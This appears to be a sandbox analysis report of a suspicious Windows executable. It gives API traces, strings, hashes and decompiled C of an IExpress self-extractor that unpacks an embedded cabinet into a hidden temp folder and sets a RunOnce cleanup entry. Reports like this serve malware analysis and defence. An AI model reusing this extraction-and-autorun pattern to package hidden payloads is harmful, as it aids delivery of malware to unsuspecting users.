RegQueryValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003020C9
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003020EA
GetSystemDirectoryA.KERNEL32 ref: 00302103
LoadLibraryA.KERNELBASE(?,advpack.dll,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00302122
GetProcAddress.KERNEL32(00000000,DelNodeRunDLL32), ref: 00302134
FreeLibrary.KERNELBASE(00000000,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00302144
GetSystemDirectoryA.KERNEL32 ref: 0030215B
GetModuleFileNameA.KERNEL32(?,00000104,?,?,?,?,?,?,?,?,00000000,00000000), ref: 0030218C
LocalAlloc.KERNEL32(00000040,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003021C1
RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 003021E4
RegSetValueExA.KERNELBASE(?,wextract_cleanup1,00000000,00000001,00000000,00000002,?,?,?,?,?,?,?,?,?), ref: 0030223D
RegCloseKey.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00302249
LocalFree.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 00302250

Strings

wextract_cleanup1, xrefs: 003020A5, 003020BE, 003020F0, 00302232
DelNodeRunDLL32, xrefs: 0030212E
wextract_cleanup%d, xrefs: 0030209E
%s /D:%s, xrefs: 003021FF, 00302210
advpack.dll, xrefs: 00302109
Software\Microsoft\Windows\CurrentVersion\RunOnce, xrefs: 00302082
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003021A8, 00302204
rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s", xrefs: 003021F6

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Close$DirectoryFreeLibraryLocalSystemValuememset$AddressAllocCreateFileLoadModuleNameProcQuery_vsnprintf
String ID: %s /D:%s$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$DelNodeRunDLL32$Software\Microsoft\Windows\CurrentVersion\RunOnce$advpack.dll$rundll32.exe %sadvpack.dll,DelNodeRunDLL32 "%s"$wextract_cleanup%d$wextract_cleanup1
API String ID: 178549006-217856272
Opcode ID: 27f32461115b2197befed6739172e103a1faa09e1fe9de1d18f2affc9a113f96
Instruction ID: 41c0169fed81026cfd3e1e85e9f00fa328987d7600a235df5d0c930af1620c33
Opcode Fuzzy Hash: 27f32461115b2197befed6739172e103a1faa09e1fe9de1d18f2affc9a113f96
Instruction Fuzzy Hash: B8513571A02618AFDB279B64EC6DFEB773CEB44700F0001A6FA45E71D1DA709E498B60

Uniqueness

Uniqueness Score: -1.00%

Function 003055A0 Relevance: 31.7, APIs: 12, Strings: 6, Instructions: 248
memorystringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 92%

			E003055A0(void* __eflags) {
				signed int _v8;
				char _v265;
				char _v268;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t28;
				int _t32;
				int _t33;
				int _t35;
				signed int _t36;
				signed int _t38;
				int _t40;
				int _t44;
				long _t48;
				int _t49;
				int _t50;
				signed int _t53;
				int _t54;
				int _t59;
				char _t60;
				int _t65;
				char _t66;
				int _t67;
				int _t68;
				int _t69;
				int _t70;
				int _t71;
				struct _SECURITY_ATTRIBUTES* _t72;
				int _t73;
				CHAR* _t82;
				CHAR* _t88;
				void* _t103;
				signed int _t110;

				_t28 =  *0x308004; // 0xcd371c79
				_v8 = _t28 ^ _t110;
				_t2 = E0030468F("RUNPROGRAM", 0, 0) + 1; // 0x1
				_t109 = LocalAlloc(0x40, _t2);
				if(_t109 != 0) {
					_t82 = "RUNPROGRAM";
					_t32 = E0030468F(_t82, _t109, 1);
					__eflags = _t32;
					if(_t32 != 0) {
						_t33 = lstrcmpA(_t109, "<None>");
						__eflags = _t33;
						if(_t33 == 0) {
							 *0x309a30 = 1;
						}
						LocalFree(_t109);
						_t35 =  *0x308b3e; // 0x0
						__eflags = _t35;
						if(_t35 == 0) {
							__eflags =  *0x308a24; // 0x0
							if(__eflags != 0) {
								L46:
								_t101 = 0x7d2;
								_t36 = E00306517(_t82, 0x7d2, 0, E00303210, 0, 0);
								asm("sbb eax, eax");
								_t38 =  ~( ~_t36);
							} else {
								__eflags =  *0x309a30; // 0x0
								if(__eflags != 0) {
									goto L46;
								} else {
									_t109 = 0x3091e4;
									_t40 = GetTempPathA(0x104, 0x3091e4);
									__eflags = _t40;
									if(_t40 == 0) {
										L19:
										_push(_t82);
										E00301781( &_v268, 0x104, _t82, "A:\\");
										__eflags = _v268 - 0x5a;
										if(_v268 <= 0x5a) {
											do {
												_t109 = GetDriveTypeA( &_v268);
												__eflags = _t109 - 6;
												if(_t109 == 6) {
													L22:
													_t48 = GetFileAttributesA( &_v268);
													__eflags = _t48 - 0xffffffff;
													if(_t48 != 0xffffffff) {
														goto L30;
													} else {
														goto L23;
													}
												} else {
													__eflags = _t109 - 3;
													if(_t109 != 3) {
														L23:
														__eflags = _t109 - 2;
														if(_t109 != 2) {
															L28:
															_t66 = _v268;
															goto L29;
														} else {
															_t66 = _v268;
															__eflags = _t66 - 0x41;
															if(_t66 == 0x41) {
																L29:
																_t60 = _t66 + 1;
																_v268 = _t60;
																goto L42;
															} else {
																__eflags = _t66 - 0x42;
																if(_t66 == 0x42) {
																	goto L29;
																} else {
																	_t68 = E00306952( &_v268);
																	__eflags = _t68;
																	if(_t68 == 0) {
																		goto L28;
																	} else {
																		__eflags = _t68 - 0x19000;
																		if(_t68 >= 0x19000) {
																			L30:
																			_push(0);
																			_t103 = 3;
																			_t49 = E0030597D( &_v268, _t103, 1);
																			__eflags = _t49;
																			if(_t49 != 0) {
																				L33:
																				_t50 = E00302630(0,  &_v268, 1);
																				__eflags = _t50;
																				if(_t50 != 0) {
																					GetWindowsDirectoryA( &_v268, 0x104);
																				}
																				_t88 =  &_v268;
																				E0030658A(_t88, 0x104, "msdownld.tmp");
																				_t53 = GetFileAttributesA( &_v268);
																				__eflags = _t53 - 0xffffffff;
																				if(_t53 != 0xffffffff) {
																					_t54 = _t53 & 0x00000010;
																					__eflags = _t54;
																				} else {
																					_t54 = CreateDirectoryA( &_v268, 0);
																				}
																				__eflags = _t54;
																				if(_t54 != 0) {
																					SetFileAttributesA( &_v268, 2);
																					_push(_t88);
																					_t109 = 0x3091e4;
																					E00301781(0x3091e4, 0x104, _t88,  &_v268);
																					_t101 = 1;
																					_t59 = E00305467(0x3091e4, 1, 0);
																					__eflags = _t59;
																					if(_t59 != 0) {
																						goto L45;
																					} else {
																						_t60 = _v268;
																						goto L42;
																					}
																				} else {
																					_t60 = _v268 + 1;
																					_v265 = 0;
																					_v268 = _t60;
																					goto L42;
																				}
																			} else {
																				_t65 = E00302630(0,  &_v268, 1);
																				__eflags = _t65;
																				if(_t65 != 0) {
																					goto L28;
																				} else {
																					_t67 = E0030597D( &_v268, 1, 1, 0);
																					__eflags = _t67;
																					if(_t67 == 0) {
																						goto L28;
																					} else {
																						goto L33;
																					}
																				}
																			}
																		} else {
																			goto L28;
																		}
																	}
																}
															}
														}
													} else {
														goto L22;
													}
												}
												goto L47;
												L42:
												__eflags = _t60 - 0x5a;
											} while (_t60 <= 0x5a);
										}
										goto L43;
									} else {
										_t101 = 1;
										_t69 = E00305467(0x3091e4, 1, 3); // executed
										__eflags = _t69;
										if(_t69 != 0) {
											goto L45;
										} else {
											_t82 = 0x3091e4;
											_t70 = E00302630(0, 0x3091e4, 1);
											__eflags = _t70;
											if(_t70 != 0) {
												goto L19;
											} else {
												_t101 = 1;
												_t82 = 0x3091e4;
												_t71 = E00305467(0x3091e4, 1, 1);
												__eflags = _t71;
												if(_t71 != 0) {
													goto L45;
												} else {
													do {
														goto L19;
														L43:
														GetWindowsDirectoryA( &_v268, 0x104);
														_push(4);
														_t101 = 3;
														_t82 =  &_v268;
														_t44 = E0030597D(_t82, _t101, 1);
														__eflags = _t44;
													} while (_t44 != 0);
													goto L2;
												}
											}
										}
									}
								}
							}
						} else {
							__eflags = _t35 - 0x5c;
							if(_t35 != 0x5c) {
								L10:
								_t72 = 1;
							} else {
								__eflags =  *0x308b3f - _t35; // 0x0
								_t72 = 0;
								if(__eflags != 0) {
									goto L10;
								}
							}
							_t101 = 0;
							_t73 = E00305467(0x308b3e, 0, _t72);
							__eflags = _t73;
							if(_t73 != 0) {
								L45:
								_t38 = 1;
							} else {
								_t101 = 0x4be;
								E003044B9(0, 0x4be, 0, 0, 0x10, 0);
								goto L2;
							}
						}
					} else {
						_t101 = 0x4b1;
						E003044B9(0, 0x4b1, 0, 0, 0x10, 0);
						LocalFree(_t109);
						 *0x309124 = 0x80070714;
						goto L2;
					}
				} else {
					_t101 = 0x4b5;
					E003044B9(0, 0x4b5, 0, 0, 0x10, 0);
					 *0x309124 = E00306285();
					L2:
					_t38 = 0;
				}
				L47:
				return E00306CE0(_t38, 0, _v8 ^ _t110, _t101, 1, _t109);
			}

0x003055ab
0x003055b2
0x003055c9
0x003055d5
0x003055d9
0x00305600
0x00305605
0x0030560a
0x0030560c
0x00305638
0x00305641
0x00305643
0x00305645
0x00305645
0x0030564c
0x00305652
0x00305657
0x00305659
0x00305696
0x0030569c
0x0030589f
0x003058a7
0x003058ac
0x003058b3
0x003058b5
0x003056a2
0x003056a2
0x003056a8
0x00000000
0x003056ae
0x003056ae
0x003056b9
0x003056bf
0x003056c1
0x003056f3
0x003056f3
0x00305705
0x0030570a
0x00305711
0x00305717
0x00305724
0x00305726
0x00305729
0x00305730
0x00305737
0x0030573d
0x00305740
0x00000000
0x00000000
0x00000000
0x00000000
0x0030572b
0x0030572b
0x0030572e
0x00305742
0x00305742
0x00305745
0x0030576b
0x0030576b
0x00000000
0x00305747
0x00305747
0x0030574d
0x0030574f
0x00305771
0x00305771
0x00305773
0x00000000
0x00305751
0x00305751
0x00305753
0x00000000
0x00305755
0x0030575b
0x00305760
0x00305762
0x00000000
0x00305764
0x00305764
0x00305769
0x0030577e
0x0030577e
0x00305781
0x00305788
0x0030578d
0x0030578f
0x003057b2
0x003057b8
0x003057bd
0x003057bf
0x003057cd
0x003057cd
0x003057dd
0x003057e3
0x003057ef
0x003057f5
0x003057f8
0x0030580a
0x0030580a
0x003057fa
0x00305802
0x00305802
0x0030580d
0x0030580f
0x00305830
0x00305836
0x0030583d
0x0030584b
0x00305851
0x00305855
0x0030585a
0x0030585c
0x00000000
0x0030585e
0x0030585e
0x00000000
0x0030585e
0x00305811
0x00305817
0x00305819
0x0030581f
0x00000000
0x0030581f
0x00305791
0x00305797
0x0030579c
0x0030579e
0x00000000
0x003057a0
0x003057a9
0x003057ae
0x003057b0
0x00000000
0x00000000
0x00000000
0x00000000
0x003057b0
0x0030579e
0x00000000
0x00000000
0x00000000
0x00305769
0x00305762
0x00305753
0x0030574f
0x00000000
0x00000000
0x00000000
0x0030572e
0x00000000
0x00305864
0x00305864
0x00305864
0x00305717
0x00000000
0x003056c3
0x003056c5
0x003056c9
0x003056ce
0x003056d0
0x00000000
0x003056d6
0x003056d6
0x003056d8
0x003056dd
0x003056df
0x00000000
0x003056e1
0x003056e2
0x003056e4
0x003056e6
0x003056eb
0x003056ed
0x00000000
0x003056f3
0x003056f3
0x00000000
0x0030586c
0x00305878
0x0030587e
0x00305882
0x00305883
0x00305889
0x0030588e
0x0030588e
0x00000000
0x00305896
0x003056ed
0x003056df
0x003056d0
0x003056c1
0x003056a8
0x0030565b
0x0030565b
0x0030565d
0x00305669
0x00305669
0x0030565f
0x0030565f
0x00305665
0x00305667
0x00000000
0x00000000
0x00305667
0x0030566c
0x00305673
0x00305678
0x0030567a
0x0030589b
0x0030589b
0x00305680
0x00305685
0x0030568c
0x00000000
0x0030568c
0x0030567a
0x0030560e
0x00305613
0x0030561a
0x00305620
0x00305626
0x00000000
0x00305626
0x003055db
0x003055e0
0x003055e7
0x003055f1
0x003055f6
0x003055f6
0x003055f6
0x003058b7
0x003058c7

APIs

Part of subcall function 0030468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003046A0
Part of subcall function 0030468F: SizeofResource.KERNEL32(00000000,00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046A9
Part of subcall function 0030468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003046C3
Part of subcall function 0030468F: LoadResource.KERNEL32(00000000,00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046CC
Part of subcall function 0030468F: LockResource.KERNEL32(00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046D3
Part of subcall function 0030468F: memcpy_s.MSVCRT ref: 003046E5
Part of subcall function 0030468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 003046EF

LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000), ref: 003055CF
lstrcmpA.KERNEL32(00000000,<None>,00000000), ref: 00305638
LocalFree.KERNEL32(00000000), ref: 0030564C
LocalFree.KERNEL32(00000000,00000000,00000000,00000010,00000000,00000000), ref: 00305620

Part of subcall function 003044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00304518
Part of subcall function 003044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00304554

Part of subcall function 00306285: GetLastError.KERNEL32(00305BBC), ref: 00306285

GetTempPathA.KERNEL32(00000104,C:\Users\user\AppData\Local\Temp\IXP001.TMP\), ref: 003056B9
GetDriveTypeA.KERNEL32(0000005A,?,A:\), ref: 0030571E
GetFileAttributesA.KERNEL32(0000005A,?,A:\), ref: 00305737
GetWindowsDirectoryA.KERNEL32(0000005A,00000104,00000000,?,A:\), ref: 003057CD
GetFileAttributesA.KERNEL32(0000005A,msdownld.tmp,00000000,?,A:\), ref: 003057EF
CreateDirectoryA.KERNEL32(0000005A,00000000,?,A:\), ref: 00305802

Part of subcall function 00302630: GetWindowsDirectoryA.KERNEL32(?,00000104,00000000), ref: 00302654

SetFileAttributesA.KERNEL32(0000005A,00000002,?,A:\), ref: 00305830

Part of subcall function 00306517: FindResourceA.KERNEL32(00300000,000007D6,00000005), ref: 0030652A
Part of subcall function 00306517: LoadResource.KERNEL32(00300000,00000000,?,?,00302EE8,00000000,003019E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00306538
Part of subcall function 00306517: DialogBoxIndirectParamA.USER32(00300000,00000000,00000547,003019E0,00000000), ref: 00306557
Part of subcall function 00306517: FreeResource.KERNEL32(00000000,?,?,00302EE8,00000000,003019E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00306560

GetWindowsDirectoryA.KERNEL32(0000005A,00000104,?,A:\), ref: 00305878

Part of subcall function 0030597D: GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003059A8
Part of subcall function 0030597D: SetCurrentDirectoryA.KERNELBASE(?), ref: 003059AF

Strings

A:\, xrefs: 003056F4
msdownld.tmp, xrefs: 003057D3
RUNPROGRAM, xrefs: 003055BD, 00305600
C:\Users\user\AppData\Local\Temp\IXP001.TMP\, xrefs: 003056AE, 003056B3, 0030583D
<None>, xrefs: 00305632
Z, xrefs: 0030570A

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: Resource$Directory$Free$AttributesFileFindLoadLocalWindows$Current$AllocCreateDialogDriveErrorIndirectLastLockMessageParamPathSizeofStringTempTypelstrcmpmemcpy_s
String ID: <None>$A:\$C:\Users\user\AppData\Local\Temp\IXP001.TMP\$RUNPROGRAM$Z$msdownld.tmp
API String ID: 2436801531-1384155332
Opcode ID: f8dbd60bd9f8c06178fae23fbeb9dcbe11affe3999f6e478a1b70561a5920f4e
Instruction ID: 57c4d6fb548bd1a0c62a22d6eb309369e448543385592701e3e502187ccb394b
Opcode Fuzzy Hash: f8dbd60bd9f8c06178fae23fbeb9dcbe11affe3999f6e478a1b70561a5920f4e
Instruction Fuzzy Hash: 66812970B07A089BDB279B359C75BEB726D9B64300F0400A6F986D61D1DFB08EC18E55

Uniqueness

Uniqueness Score: -1.00%

Function 0030597D Relevance: 19.7, APIs: 13, Instructions: 212
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 96%

			E0030597D(CHAR* __ecx, signed char __edx, void* __edi, intOrPtr _a4) {
				signed int _v8;
				char _v16;
				char _v276;
				char _v788;
				long _v792;
				long _v796;
				long _v800;
				signed int _v804;
				long _v808;
				int _v812;
				long _v816;
				long _v820;
				void* __ebx;
				void* __esi;
				signed int _t46;
				int _t50;
				signed int _t55;
				void* _t66;
				int _t69;
				signed int _t73;
				signed short _t78;
				signed int _t87;
				signed int _t101;
				int _t102;
				unsigned int _t103;
				unsigned int _t105;
				signed int _t111;
				long _t112;
				signed int _t116;
				CHAR* _t118;
				signed int _t119;
				signed int _t120;

				_t114 = __edi;
				_t46 =  *0x308004; // 0xcd371c79
				_v8 = _t46 ^ _t120;
				_v804 = __edx;
				_t118 = __ecx;
				GetCurrentDirectoryA(0x104,  &_v276);
				_t50 = SetCurrentDirectoryA(_t118); // executed
				if(_t50 != 0) {
					_push(__edi);
					_v796 = 0;
					_v792 = 0;
					_v800 = 0;
					_v808 = 0;
					_t55 = GetDiskFreeSpaceA(0,  &_v796,  &_v792,  &_v800,  &_v808); // executed
					__eflags = _t55;
					if(_t55 == 0) {
						L29:
						memset( &_v788, 0, 0x200);
						 *0x309124 = E00306285();
						FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
						_t110 = 0x4b0;
						L30:
						__eflags = 0;
						E003044B9(0, _t110, _t118,  &_v788, 0x10, 0);
						SetCurrentDirectoryA( &_v276);
						L31:
						_t66 = 0;
						__eflags = 0;
						L32:
						_pop(_t114);
						goto L33;
					}
					_t69 = _v792 * _v796;
					_v812 = _t69;
					_t116 = MulDiv(_t69, _v800, 0x400);
					__eflags = _t116;
					if(_t116 == 0) {
						goto L29;
					}
					_t73 = GetVolumeInformationA(0, 0, 0, 0,  &_v820,  &_v816, 0, 0); // executed
					__eflags = _t73;
					if(_t73 != 0) {
						SetCurrentDirectoryA( &_v276); // executed
						_t101 =  &_v16;
						_t111 = 6;
						_t119 = _t118 - _t101;
						__eflags = _t119;
						while(1) {
							_t22 = _t111 - 4; // 0x2
							__eflags = _t22;
							if(_t22 == 0) {
								break;
							}
							_t87 =  *((intOrPtr*)(_t119 + _t101));
							__eflags = _t87;
							if(_t87 == 0) {
								break;
							}
							 *_t101 = _t87;
							_t101 = _t101 + 1;
							_t111 = _t111 - 1;
							__eflags = _t111;
							if(_t111 != 0) {
								continue;
							}
							break;
						}
						__eflags = _t111;
						if(_t111 == 0) {
							_t101 = _t101 - 1;
							__eflags = _t101;
						}
						 *_t101 = 0;
						_t112 = 0x200;
						_t102 = _v812;
						_t78 = 0;
						_t118 = 8;
						while(1) {
							__eflags = _t102 - _t112;
							if(_t102 == _t112) {
								break;
							}
							_t112 = _t112 + _t112;
							_t78 = _t78 + 1;
							__eflags = _t78 - _t118;
							if(_t78 < _t118) {
								continue;
							}
							break;
						}
						__eflags = _t78 - _t118;
						if(_t78 != _t118) {
							__eflags =  *0x309a34 & 0x00000008;
							if(( *0x309a34 & 0x00000008) == 0) {
								L20:
								_t103 =  *0x309a38; // 0x0
								_t110 =  *((intOrPtr*)(0x3089e0 + (_t78 & 0x0000ffff) * 4));
								L21:
								__eflags = (_v804 & 0x00000003) - 3;
								if((_v804 & 0x00000003) != 3) {
									__eflags = _v804 & 0x00000001;
									if((_v804 & 0x00000001) == 0) {
										__eflags = _t103 - _t116;
									} else {
										__eflags = _t110 - _t116;
									}
								} else {
									__eflags = _t103 + _t110 - _t116;
								}
								if(__eflags <= 0) {
									 *0x309124 = 0;
									_t66 = 1;
								} else {
									_t66 = E0030268B(_a4, _t110, _t103,  &_v16);
								}
								goto L32;
							}
							__eflags = _v816 & 0x00008000;
							if((_v816 & 0x00008000) == 0) {
								goto L20;
							}
							_t105 =  *0x309a38; // 0x0
							_t110 =  *((intOrPtr*)(0x3089e0 + (_t78 & 0x0000ffff) * 4)) +  *((intOrPtr*)(0x3089e0 + (_t78 & 0x0000ffff) * 4));
							_t103 = (_t105 >> 2) +  *0x309a38;
							goto L21;
						}
						_t110 = 0x4c5;
						E003044B9(0, 0x4c5, 0, 0, 0x10, 0);
						goto L31;
					}
					memset( &_v788, 0, 0x200);
					 *0x309124 = E00306285();
					FormatMessageA(0x1000, 0, GetLastError(), 0,  &_v788, 0x200, 0);
					_t110 = 0x4f9;
					goto L30;
				} else {
					_t110 = 0x4bc;
					E003044B9(0, 0x4bc, 0, 0, 0x10, 0);
					 *0x309124 = E00306285();
					_t66 = 0;
					L33:
					return E00306CE0(_t66, 0, _v8 ^ _t120, _t110, _t114, _t118);
				}
			}

0x0030597d
0x00305988
0x0030598f
0x0030599a
0x003059a6
0x003059a8
0x003059af
0x003059b9
0x003059dd
0x003059e4
0x003059f1
0x003059fe
0x00305a0b
0x00305a13
0x00305a19
0x00305a1b
0x00305ba1
0x00305baf
0x00305bbd
0x00305bd8
0x00305bde
0x00305be3
0x00305bec
0x00305bf0
0x00305bfc
0x00305c02
0x00305c02
0x00305c02
0x00305c04
0x00305c04
0x00000000
0x00305c04
0x00305a27
0x00305a3a
0x00305a46
0x00305a48
0x00305a4a
0x00000000
0x00000000
0x00305a64
0x00305a6a
0x00305a6c
0x00305abc
0x00305ac2
0x00305ac9
0x00305aca
0x00305aca
0x00305acc
0x00305acc
0x00305acf
0x00305ad1
0x00000000
0x00000000
0x00305ad3
0x00305ad6
0x00305ad8
0x00000000
0x00000000
0x00305ada
0x00305adc
0x00305add
0x00305add
0x00305ae0
0x00000000
0x00000000
0x00000000
0x00305ae0
0x00305ae2
0x00305ae4
0x00305ae6
0x00305ae6
0x00305ae6
0x00305ae9
0x00305aeb
0x00305af0
0x00305af6
0x00305af8
0x00305af9
0x00305af9
0x00305afb
0x00000000
0x00000000
0x00305afd
0x00305aff
0x00305b00
0x00305b03
0x00000000
0x00000000
0x00000000
0x00305b03
0x00305b05
0x00305b08
0x00305b20
0x00305b27
0x00305b52
0x00305b52
0x00305b5b
0x00305b62
0x00305b6b
0x00305b6d
0x00305b76
0x00305b7d
0x00305b83
0x00305b7f
0x00305b7f
0x00305b7f
0x00305b6f
0x00305b72
0x00305b72
0x00305b85
0x00305b98
0x00305b9e
0x00305b87
0x00305b8f
0x00305b8f
0x00000000
0x00305b85
0x00305b29
0x00305b33
0x00000000
0x00000000
0x00305b35
0x00305b48
0x00305b4a
0x00000000
0x00305b4a
0x00305b0f
0x00305b16
0x00000000
0x00305b16
0x00305a7c
0x00305a8a
0x00305aa5
0x00305aab
0x00000000
0x003059bb
0x003059c0
0x003059c7
0x003059d1
0x003059d6
0x00305c05
0x00305c14
0x00305c14

APIs

GetCurrentDirectoryA.KERNEL32(00000104,?,00000000,00000000), ref: 003059A8
SetCurrentDirectoryA.KERNELBASE(?), ref: 003059AF
GetDiskFreeSpaceA.KERNELBASE(00000000,?,?,?,?,00000001), ref: 00305A13
MulDiv.KERNEL32(?,?,00000400), ref: 00305A40
GetVolumeInformationA.KERNELBASE(00000000,00000000,00000000,00000000,?,?,00000000,00000000), ref: 00305A64
memset.MSVCRT ref: 00305A7C
GetLastError.KERNEL32(00000000,?,00000200,00000000), ref: 00305A98
FormatMessageA.KERNEL32(00001000,00000000,00000000), ref: 00305AA5
SetCurrentDirectoryA.KERNEL32(?,?,?,00000010,00000000), ref: 00305BFC

Part of subcall function 003044B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00304518
Part of subcall function 003044B9: MessageBoxA.USER32(?,?,doza2,00010010), ref: 00304554

Part of subcall function 00306285: GetLastError.KERNEL32(00305BBC), ref: 00306285

Memory Dump Source

Source File: 00000001.00000002.385223689.0000000000301000.00000020.00000001.01000000.00000004.sdmp, Offset: 00300000, based on PE: true

Associated: 00000001.00000002.385193125.0000000000300000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385558273.0000000000308000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030A000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000001.00000002.385568110.000000000030C000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_1_2_300000_kino0095.jbxd

Similarity

API ID: CurrentDirectory$ErrorLastMessage$DiskFormatFreeInformationLoadSpaceStringVolumememset
String ID:
API String ID: 4237285672-0
Opcode ID: 483cfebf853aaaad68c399184ef6e7fe51f1054dd80301b0d01b2327abc582a3
Instruction ID: 5ec21da6c11f0fa778469bd0acdc7d096486a103b66ce25cbfa7f6862efb68f8
Opcode Fuzzy Hash: 483cfebf853aaaad68c399184ef6e7fe51f1054dd80301b0d01b2327abc582a3
Instruction Fuzzy Hash: F871A3B1A0260CAFEB17DF64DCA5FFB77ACEB48300F0444AAF54596181DA309E848F64

Uniqueness

Uniqueness Score: -1.00%

Function 00304FE0 Relevance: 19.4, APIs: 9, Strings: 2, Instructions: 121
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 77%

			E00304FE0(void* __edi, void* __eflags) {
				void* __ebx;
				void* _t8;
				struct HWND__* _t9;
				int _t10;
				void* _t12;
				struct HWND__* _t24;
				struct HWND__* _t27;
				intOrPtr _t29;
				void* _t33;
				int _t34;
				CHAR* _t36;
				int _t37;
				intOrPtr _t47;

				_t33 = __edi;
				_t36 = "CABINET";
				 *0x309144 = E0030468F(_t36, 0, 0);
				_t8 = LockResource(LoadResource(0, FindResourceA(0, _t36, 0xa)));
				 *0x309140 = _t8;
				if(_t8 == 0) {
					return _t8;
				}
				_t9 =  *0x308584; // 0x0
				if(_t9 != 0) {
					ShowWindow(GetDlgItem(_t9, 0x842), 0);
					ShowWindow(GetDlgItem( *0x308584, 0x841), 5);
				}
				_t10 = E00304EFD(0, 0);
				if(_t10 != 0) {
					__imp__#20(E00304CA0, E00304CC0, E00304980, E00304A50, E00304AD0, E00304B60, E00304BC0, 1, 0x309148, _t33);
					_t34 = _t10;
					if(_t34 == 0) {
						L8:
						_t29 =  *0x309148; // 0x0
						_t24 =  *0x308584; // 0x0
						E003044B9(_t24, _t29 + 0x514, 0, 0, 0x10, 0);
						_t37 = 0;
						L9:
						goto L10;
					}
					__imp__#22(_t34, "*MEMCAB", 0x301140, 0, E00304CD0, 0, 0x309140); // executed
					_t37 = _t10;
					if(_t37 == 0) {
						goto L9;
					}
					__imp__#23(_t34); // executed
					if(_t10 != 0) {
						goto L9;
					}
					goto L8;
				} else {
					_t27 =  *0x308584; // 0x0
					E003044B9(_t27, 0x4ba, 0, 0, 0x10, 0);
					_t37 = 0;
					L10:
					_t12 =  *0x309140; // 0x0
					if(_t12 != 0) {
						FreeResource(_t12);
						 *0x309140 = 0;
					}
					if(_t37 == 0) {
						_t47 =  *0x3091d8; // 0x0
						if(_t47 == 0) {
							E003044B9(0, 0x4f8, 0, 0, 0x10, 0);
						}
					}
					if(( *0x308a38 & 0x00000001) == 0 && ( *0x309a34 & 0x00000001) == 0) {
						SendMessageA( *0x308584, 0xfa1, _t37, 0);
					}
					return _t37;
				}
			}

0x00304fe0
0x00304fe6
0x00304ff9
0x0030500d
0x00305013
0x0030501a
0x00305163
0x00305163
0x00305020
0x00305027
0x00305037
0x00305051
0x00305051
0x00305057
0x0030505e
0x003050a7
0x003050ad
0x003050b4
0x003050e8
0x003050e8
0x003050ee
0x003050ff
0x00305104
0x00305106
0x00000000
0x00305106
0x003050cd
0x003050d3
0x003050da
0x00000000
0x00000000
0x003050dd
0x003050e6
0x00000000
0x00000000
0x00000000
0x00305060
0x00305060
0x00305070
0x00305075
0x00305107
0x00305107
0x0030510e
0x00305111
0x00305117
0x00305117
0x0030511f
0x00305121
0x00305127
0x00305135
0x00305135
0x00305127
0x00305141
0x00305159
0x00305159
0x00000000
0x0030515f

APIs

Part of subcall function 0030468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003046A0
Part of subcall function 0030468F: SizeofResource.KERNEL32(00000000,00000000,?,00302D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 003046A9
Part of subcall function 0030468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 003046C3
